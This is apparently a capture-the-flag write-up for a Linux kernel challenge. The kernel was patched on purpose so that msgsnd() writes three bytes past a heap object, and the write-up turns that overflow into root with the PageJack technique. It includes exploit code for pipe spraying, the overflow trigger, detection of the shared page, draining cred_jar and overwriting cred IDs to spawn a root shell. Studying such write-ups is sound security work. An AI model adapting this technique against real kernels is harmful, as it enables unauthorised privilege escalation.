TL;DR

A 3-byte heap OOB write in msgsnd() is leveraged into a page-level UAF and then into root via a struct cred overwrite (PageJack).

Description: i love sending messages, so i made it possible to add just a few more bytes to them

Vulnerability

A custom Linux 6.10.9 kernel ships with the following patch in ipc/msgutil.c:

@@ -93,7 +93,7 @@
        return ERR_PTR(-ENOMEM);

    alen = min(len, DATALEN_MSG);
-   if (copy_from_user(msg + 1, src, alen))
+   if (copy_from_user(msg + 1, src, alen + 3))
        goto out_err;

load_msg(), invoked by msgsnd(), copies alen + 3 bytes from userland into a freshly allocated msg_msg slab object. Three bytes are therefore written past the end of the object and, once any tail padding in the slot is used up, into the next object in the same slab. The allocation size (via msgsz) and the three overflow bytes (mtext[msgsz], mtext[msgsz+1] and mtext[msgsz+2] in the user buffer) are both attacker-controlled.

Relevant kernel configuration:

  • CONFIG_RANDSTRUCT_NONE=y (no field reordering on kernel structs)
  • HARDENED_USERCOPY, INIT_ON_ALLOC, INIT_ON_FREE, RANDOM_KMALLOC_CACHES are disabled
  • KASLR / SMAP / SMEP / KPTI are enabled but irrelevant (the exploit requires no infoleak)

Object collision in kmalloc-cg-1k

struct msg_msg has a 48-byte header followed by the payload:

struct msg_msg {
    struct list_head m_list;     // 16 B
    long m_type;                  //  8 B
    size_t m_ts;                  //  8 B
    struct msg_msgseg *next;      //  8 B
    void *security;               //  8 B
    /* payload */
};

msgsnd() allocates kmalloc(48 + msgsz, GFP_KERNEL_ACCOUNT). The _ACCOUNT flag routes the allocation into the kmalloc-cg-* accounted caches.

A pipe is backed by a ring of 16 pipe_buffer structs allocated as a single array:

struct pipe_buffer {
    struct page *page;            // offset 0
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};                                // sizeof = 40 B

The ring is 16 * 40 = 640 bytes, allocated via kcalloc(..., GFP_KERNEL_ACCOUNT). Both pipe_buffer[16] (640 → 1024) and a msg_msg with msgsz = 974 (48 + 974 = 1022 → 1024) land in kmalloc-cg-1k. When such a msg_msg sits directly before a pipe_buffer[16] in the slab, the overflow reaches the first field of that array, pipe_buffer[0].page: two of the three extra bytes are absorbed by the slot's 2-byte tail padding and the third overwrites the pointer's least significant byte.
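The size-class arithmetic can be checked with a small user-space sketch. It assumes the usual x86_64 SLUB size classes (including the 96- and 192-byte caches) and the 48-byte header quoted above; kmalloc_slot_size() and msg_msg_slot_size() are illustrative names, not kernel functions.

```c
#include <stddef.h>

/* Assumed generic kmalloc size classes up to 8 KiB (x86_64, default SLUB). */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Slot size that serves a request of `size` bytes, or 0 if it is too large
 * for the classes modeled here. */
size_t kmalloc_slot_size(size_t size)
{
    size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);
    for (size_t i = 0; i < n; i++)
        if (size <= kmalloc_classes[i])
            return kmalloc_classes[i];
    return 0;
}

/* Slot size for a msg_msg carrying msgsz payload bytes (48-byte header). */
size_t msg_msg_slot_size(size_t msgsz)
{
    return kmalloc_slot_size(48 + msgsz);
}
```

Under these assumptions, msg_msg_slot_size(974) and kmalloc_slot_size(16 * 40) both return 1024, while a payload of 977 bytes already rounds up to 2048.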

PageJack primitive

The kernel maintains a struct page descriptor for every physical page, in a flat array (the vmemmap) located around 0xffffea0000000000 on x86_64:

PFN N  →  vmemmap[N]  @ 0xffffea0000000000 + N * 0x40

Since sizeof(struct page) == 0x40, every valid struct page * has one of {0x00, 0x40, 0x80, 0xC0} as its low byte. Overwriting that low byte with 0x40 yields:

original LSB   net shift   target
0x00           +0x40       PFN + 1
0x40           0           no-op
0x80           -0x40       PFN - 1
0xC0           -0x80       PFN - 2

In three cases out of four, pipe_buffer.page is shifted to a different struct page, which describes a different physical page. No PTE is involved; the corruption is purely in the kernel pointer that is later dereferenced for pipe I/O.
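The shift table can be reproduced with plain integer arithmetic. The sketch below is a user-space model only: the vmemmap base is the approximate value quoted above (any base with a zero low byte gives the same result), and the helper names are made up for illustration.

```c
#include <stdint.h>

#define VMEMMAP_BASE   0xffffea0000000000ULL  /* assumed base, as quoted in the text */
#define STRUCT_PAGE_SZ 0x40ULL                /* sizeof(struct page) */

/* Address of the struct page describing a given PFN. */
uint64_t page_addr_of_pfn(uint64_t pfn)
{
    return VMEMMAP_BASE + pfn * STRUCT_PAGE_SZ;
}

/* PFN described by a (64-byte aligned) struct page address. */
uint64_t pfn_of_page_addr(uint64_t addr)
{
    return (addr - VMEMMAP_BASE) / STRUCT_PAGE_SZ;
}

/* Replace the least significant byte of a pointer, as the overflow does. */
uint64_t overwrite_lsb(uint64_t ptr, uint8_t lsb)
{
    return (ptr & ~0xffULL) | lsb;
}

/* Signed PFN shift caused by forcing the low byte of the pointer to 0x40. */
int64_t pfn_shift(uint64_t pfn)
{
    uint64_t corrupted = overwrite_lsb(page_addr_of_pfn(pfn), 0x40);
    return (int64_t)pfn_of_page_addr(corrupted) - (int64_t)pfn;
}
```

The result depends only on pfn % 4, which is why one pipe in four is left untouched by the overwrite.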

Pipe append semantics and the marker design

When write() is called on a pipe whose last buffer has PIPE_BUF_FLAG_CAN_MERGE set and len > 0, the kernel appends data at page + buf->offset + buf->len and increments len. The destination offset on the page is fully determined by the buffer’s offset and len fields.

Reading from a pipe consumes data and invokes pipe_buf_release (which calls put_page) only when the buffer becomes empty. A read that leaves len > 0 advances offset but does not release the buffer.

The exploit uses an 8-byte marker per pipe: two consecutive 4-byte writes that merge into a single pipe_buffer[0] with offset=0, len=8. The detection scan then reads 4 bytes per pipe, leaving each touched buffer at (offset=4, len=4). Two consequences:

  1. pipe_buf_release is never called during the scan, so the underlying page is not freed prematurely.
  2. After the scan, offset + len == 8 regardless of read order. The final write, which appends at that location, will land at offset 8 of the page.

Once the page has been reclaimed by cred_jar, page offset 8 is the offset of cred.uid in the first cred slot on that page.
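The invariant is easy to check against a toy model of the two fields involved. This is a sketch that tracks only offset and len and treats the first write as an append at offset 0; it is not the kernel's pipe_write()/pipe_read() logic, and the names are hypothetical.

```c
/* User-space model of the two pipe_buffer fields that matter here. */
struct buf_model {
    unsigned int offset;
    unsigned int len;
};

/* Merge-append n bytes; returns the page offset where the data lands. */
unsigned int model_write(struct buf_model *b, unsigned int n)
{
    unsigned int dst = b->offset + b->len;
    b->len += n;
    return dst;
}

/* Consume up to n bytes; returns 1 if the buffer became empty, which is the
 * point at which the kernel would release it and put the page. */
int model_read(struct buf_model *b, unsigned int n)
{
    if (n > b->len)
        n = b->len;
    b->offset += n;
    b->len -= n;
    return b->len == 0;
}
```

After two 4-byte writes the model sits at (0, 8); a 4-byte read moves it to (4, 4) without emptying it, and in both states the next model_write() returns 8.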

cred_jar and the buddy allocator

struct cred is allocated from a dedicated slab cache (cred_jar). Slab caches are isolated at the slab layer, but they all pull backing pages from the same buddy allocator. A page returned to buddy by kmalloc-cg-1k can be reissued to cred_jar on its next refill.

The relevant fields of struct cred on Linux 6.10 (include/linux/cred.h):

0..8    atomic_long_t usage   <- refcount
8..12   kuid_t  uid
12..16  kgid_t  gid
16..20  kuid_t  suid
20..24  kgid_t  sgid
24..28  kuid_t  euid
28..32  kgid_t  egid
32..36  kuid_t  fsuid
36..40  kgid_t  fsgid

Zeroing bytes 8..36 sets uid through fsuid to 0 while leaving usage intact. With cred_jar slot size of 192 B, a single 4 KiB page hosts ~21 cred slots.
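The offsets and the slots-per-page figure can be double-checked with a user-space mirror of the leading fields. The struct below is an assumption that copies only the layout listed above (with atomic_long_t modeled as a 64-bit integer); it is not the kernel's definition, and the 192-byte slot size is the value quoted in the text.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirror of the first 40 bytes of struct cred as listed above (assumption). */
struct cred_head {
    int64_t  usage;                    /* atomic_long_t on a 64-bit kernel */
    uint32_t uid, gid, suid, sgid;
    uint32_t euid, egid, fsuid, fsgid;
};

/* Compile-time checks that the mirror matches the offsets in the text. */
_Static_assert(offsetof(struct cred_head, uid)   == 8,  "uid at offset 8");
_Static_assert(offsetof(struct cred_head, euid)  == 24, "euid at offset 24");
_Static_assert(offsetof(struct cred_head, fsuid) == 32, "fsuid at offset 32");
_Static_assert(offsetof(struct cred_head, fsgid) == 36, "fsgid at offset 36");

#define CRED_SLOT_SIZE 192u   /* cred_jar slot size quoted in the text */
#define PAGE_SIZE_4K   4096u

/* Number of whole cred slots that fit in one 4 KiB page. */
unsigned int cred_slots_per_page(void)
{
    return PAGE_SIZE_4K / CRED_SLOT_SIZE;
}
```

With these numbers cred_slots_per_page() evaluates to 21, leaving 64 unused bytes at the end of the page.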

Draining cred_jar

To force cred_jar to refill from buddy, the freelist must be emptied. A setuid() loop is the standard mechanism: each call invokes

new = prepare_creds();      // ALLOCATES a fresh cred from cred_jar
new->uid = ...;
commit_creds(new);           // current->cred = new; OLD cred returns via RCU

Allocations are immediate, while the freeing of the previous cred is RCU-deferred. In a tight loop, the freelist drains faster than RCU callbacks refill it, and once it is empty the next prepare_creds() triggers a buddy request. On this kernel, ~128 iterations are sufficient. A larger drain is counter-productive: the longer the UAF page sits in buddy, the higher the chance that another allocator consumes it first.

Exploitation

Setup: pin the process to a single CPU (stabilizes per-CPU slab partial lists) and raise RLIMIT_NOFILE (each pipe consumes two FDs).
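The descriptor-limit half of the setup could look like the sketch below. It covers only RLIMIT_NOFILE, not CPU pinning, and ensure_nofile() is a hypothetical helper name; getrlimit() and setrlimit() are the standard POSIX calls.

```c
#include <sys/resource.h>

/* Raise the soft RLIMIT_NOFILE to at least `needed` descriptors.
 * Returns 0 on success, -1 if the hard limit is too low or a call fails. */
int ensure_nofile(rlim_t needed)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NOFILE, &rl) != 0)
        return -1;
    if (rl.rlim_cur >= needed)
        return 0;                       /* already high enough */
    if (rl.rlim_max < needed)
        return -1;                      /* cannot exceed the hard limit */

    rl.rlim_cur = needed;
    return setrlimit(RLIMIT_NOFILE, &rl);
}
```

For the spray used here, a call such as ensure_nofile(2 * 384 + 16) would leave room for 384 pipes plus the standard descriptors; the slack of 16 is an arbitrary choice.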

Step 1: spray pipes

for (int i = 0; i < 384; i++) pipe(pipes[i]);

Each pipe() allocates a pipe_buffer[16] array into kmalloc-cg-1k.

Step 2: write markers

for (int i = 0; i < 384; i++) {
    write(pipes[i][1], &i, 4);
    write(pipes[i][1], &i, 4);
}

The second write merges with the first via CAN_MERGE; the buffer ends at offset=0, len=8 with the marker [i, i] written to its page.

Step 3: free 22 holes

free_special_pipes(48, 304);   // close i where i % 12 == 0

The range [48, 304] contains 22 multiples of 12 (48, 60, ..., 300), and each closed pipe is surrounded by surviving ones. A more aggressive step (e.g. 1-in-2) would allow two adjacent slots to both be reclaimed by msg_msgs, causing the overflow to clobber another msg_msg rather than a pipe_buffer.
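The helper's body is not shown in the writeup. A minimal sketch of what such a routine might look like follows; free_every_nth_pipe() and its signature are assumptions made for illustration, with the step passed explicitly rather than hard-coded.

```c
#include <unistd.h>

/* Close both ends of every pipe whose index in [lo, hi] is a multiple of
 * `step`, mark it as closed with -1, and return how many pipes were freed.
 * Entries already marked -1 are skipped. */
int free_every_nth_pipe(int pipes[][2], int lo, int hi, int step)
{
    int freed = 0;

    for (int i = lo; i <= hi; i++) {
        if (i % step != 0 || pipes[i][0] == -1)
            continue;
        close(pipes[i][0]);
        close(pipes[i][1]);
        pipes[i][0] = pipes[i][1] = -1;   /* lets the later scan skip it */
        freed++;
    }
    return freed;
}
```

Called as free_every_nth_pipe(pipes, 48, 304, 12) on a fully populated array, this closes 22 pipes. Marking closed entries with -1 matches the pipes[val][0] != -1 check used when locating the overlap.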

Step 4: trigger the overflow

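m.mtype = 1;
memset(m.mtext, 0x41, 974);      // the 974 payload bytes
m.mtext[976] = 0x40;             // third extra byte: new LSB of pipe_buffer[0].page
for (int q = 0; q < 24; q++) msgsnd(qids[q], &m, 974, 0);   // one msg_msg per queue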

msgsz = 974 → kmalloc(1022) → 1024-byte slot. copy_from_user writes 977 bytes starting at slot offset 48; mtext[974] and mtext[975] fall into the slot’s tail padding (object 1022 B, slot 1024 B); only mtext[976] reaches byte 0 of the neighboring slot, the LSB of pipe_buffer[0].page.
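The landing position of each extra byte follows from the header size and the slot size alone. The sketch below restates that arithmetic; the constants come from the text and the function names are illustrative.

```c
#include <stddef.h>

#define MSG_HDR   48u   /* sizeof(struct msg_msg), per the text */
#define OOB_BYTES 3u    /* extra bytes copied by the patched load_msg() */

/* Offset of mtext[idx] relative to the start of the NEXT slot.
 * Negative values are still inside the current slot (payload or padding). */
long offset_in_next_slot(size_t idx, size_t slot_size)
{
    return (long)(MSG_HDR + idx) - (long)slot_size;
}

/* Number of copied bytes that cross into the next slot for a given msgsz. */
size_t bytes_past_slot(size_t msgsz, size_t slot_size)
{
    size_t end = MSG_HDR + msgsz + OOB_BYTES;   /* one past the last byte written */
    return end > slot_size ? end - slot_size : 0;
}
```

For msgsz = 974 and a 1024-byte slot, exactly one byte crosses the boundary. With msgsz = 973 none does, and with msgsz = 976 all three extra bytes would land on the pointer.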

Figure 1: slab layout and OOB byte landing zone

Step 5: locate the overlap

for (int i = 0; i < 384; i++) {
    int val;
    if (read(pipes[i][0], &val, 4) != 4) continue;
    if (val != i && val >= 0 && val < 384 && pipes[val][0] != -1) {
        a = i;   // corrupted pipe
        b = val; // page's legitimate owner
        break;
    }
}

A pipe whose first 4 bytes do not match its index has had bufs[0].page shifted to another pipe’s page; the read returns that other pipe’s marker. Each read consumes 4 of 8 bytes, so the page is not released. pipes[a] and pipes[b] both reference the shared page on exit.
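The scan logic can be exercised against a small user-space model in which each pipe is reduced to a page index plus (offset, len). Everything here is hypothetical scaffolding: eight pipes instead of 384, and model_corrupt() stands in for the LSB overwrite.

```c
#define NPIPES 8

/* Minimal stand-in for one pipe: which page bufs[0] points at, and where
 * the unread data sits on that page. */
struct model_pipe {
    int page;
    unsigned int offset, len;
};

static int page_marker[NPIPES][2];      /* 8 marker bytes per page, as two ints */
static struct model_pipe mp[NPIPES];

/* Every pipe owns its own page, holding the marker [i, i]. */
void model_init(void)
{
    for (int i = 0; i < NPIPES; i++) {
        mp[i].page = i;
        mp[i].offset = 0;
        mp[i].len = 8;
        page_marker[i][0] = page_marker[i][1] = i;
    }
}

/* Simulate the corruption: pipe `a` now points at pipe `b`'s page. */
void model_corrupt(int a, int b)
{
    mp[a].page = b;
}

/* Read 4 bytes per pipe in index order; on the first mismatching marker,
 * report the corrupted pipe in *a and the page owner in *b and return 1. */
int model_scan(int *a, int *b)
{
    for (int i = 0; i < NPIPES; i++) {
        int val = page_marker[mp[i].page][mp[i].offset / 4];
        mp[i].offset += 4;              /* partial read: buffer stays alive */
        mp[i].len -= 4;
        if (val != i && val >= 0 && val < NPIPES) {
            *a = i;
            *b = val;
            return 1;
        }
    }
    return 0;
}
```

Running the model with the corrupted pipe on either side of the owner shows that the owner ends at (4, 4) when it was scanned first and at (0, 8) when the scan stopped before reaching it.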

Figure 2: pipe[a] and pipe[b] both reference the same struct page

Step 6: free the shared page

close(pipes[a][0]); close(pipes[a][1]);

pipe_release calls put_page on the shifted pointer. The refcount goes 1 → 0, the page returns to buddy. pipes[b] still holds a stale .page pointing at it: page-level UAF.

Figure 3: close(pipe[a]) returns the shared page to buddy

Step 7: drain cred_jar and fork

for (int i = 0; i < 128; i++) setuid(1000);
if (fork() == 0) fork_n_win(320);

After 128 setuid() calls, cred_jar requests a page from buddy on the next prepare_creds(). The 320 subsequent fork() calls each allocate a cred via copy_creds(); with ~21 slots per page, several land in the hijacked page.

Step 8: overwrite cred IDs

static char zeros[4096] = {0};
write(pipes[b][1], zeros, 0x18 + 4);   // 28 bytes

pipe_write appends to pipes[b].bufs[0] at page + offset + len. Two cases:

  • if b > a: pipes[b] was not read during the scan; buffer is at (0, 8).
  • if b < a: pipes[b] was read once during the scan; buffer is at (4, 4).

offset + len == 8 in both cases. The 28 zero bytes cover page offsets 8..36, i.e. uid + gid + suid + sgid + euid + egid + fsuid of the first cred slot on the page. usage (0..8) is preserved.
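The effect of the 28-byte write on the first slot can be replayed on a fake page in user space. The struct is again an assumed mirror of the leading cred fields, not the kernel type, and the initial values (usage 1, all IDs 1000) are arbitrary test data.

```c
#include <stdint.h>
#include <string.h>

/* Assumed mirror of the first 40 bytes of struct cred. */
struct cred_ids {
    int64_t  usage;
    uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
};

/* Place a cred with every ID set to 1000 at offset 0 of a fake page, apply
 * the Step 8 write (0x18 + 4 zero bytes at page offset 8), and copy the
 * result into *out. Returns 1 if uid through fsuid are all zero. */
int ids_zeroed_after_write(struct cred_ids *out)
{
    uint8_t page[4096];
    struct cred_ids c = { 1, 1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000 };

    memset(page, 0xAA, sizeof page);    /* filler for the rest of the page */
    memcpy(page, &c, sizeof c);

    memset(page + 8, 0, 0x18 + 4);      /* the write through pipes[b] */

    memcpy(out, page, sizeof *out);
    return out->uid == 0 && out->gid == 0 && out->suid == 0 && out->sgid == 0 &&
           out->euid == 0 && out->egid == 0 && out->fsuid == 0;
}
```

In this model usage keeps its value and fsgid stays at 1000, since the write stops at page offset 36.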

Figure 4: cred_jar reclaims the page; write through pipe[b] zeroes uid..fsuid

Step 9: trigger the shell

Each forked child polls getuid() and execs /bin/sh once it reads 0. The parent must not exit; closing pipes[b] would call put_page on a cred_jar page and oops the kernel.
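The child side might look like the sketch below. It is an illustration rather than the author's fork_n_win(): the function names, the bounded poll count and the one-second interval are all assumptions.

```c
#include <stddef.h>
#include <unistd.h>

/* Poll getuid() up to max_polls times, sleeping 1 s between attempts.
 * Returns 1 as soon as the process sees uid 0, otherwise 0. */
int wait_for_root(int max_polls)
{
    for (int i = 0; i < max_polls; i++) {
        if (getuid() == 0)
            return 1;
        if (i + 1 < max_polls)
            sleep(1);
    }
    return 0;
}

/* Body of one forked child: exec a shell if its cred was zeroed, else exit. */
void child_body(int max_polls)
{
    if (wait_for_root(max_polls)) {
        char *const argv[] = { "/bin/sh", NULL };
        execv("/bin/sh", argv);
    }
    _exit(0);
}
```

Only the child whose cred occupies the first slot of the hijacked page ever sees getuid() return 0; the others time out and exit without touching pipes[b].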

[+] uid=0 gid=0 euid=0 egid=0 pid=239
lactf{not_the_real_thing}

Tuning rationale

Parameter          Value                   Reason
msgsz              974                     48 + 974 = 1022 rounds to 1024, landing in kmalloc-cg-1k with exactly one byte crossing into the next slot. With msgsz ≤ 973 the extra bytes stay inside the slot; with 975 or 976 more than one pointer byte is overwritten; from 977 on the allocation moves to kmalloc-cg-2k and misses every pipe_buffer.
OOB byte           0x40                    Keeps struct page * aligned to 0x40 and shifts it to a neighboring struct page in three cases out of four. A value outside {0x00, 0x40, 0x80, 0xC0} yields a misaligned pointer that no longer references a valid struct page.
Free step          12                      Ensures each freed slot is bordered by surviving pipes, so every overflow hits a pipe_buffer.
Marker layout      2×4 B write, 4 B read   Keeps the buffer alive after the scan and places the next write at page offset 8 regardless of (a, b) ordering.
Drain              128                     Empties cred_jar’s freelist without leaving the UAF page exposed to other allocators for an extended period.
Closing pipes[b]   never                   Releasing it would call put_page on a page now owned by cred_jar.

References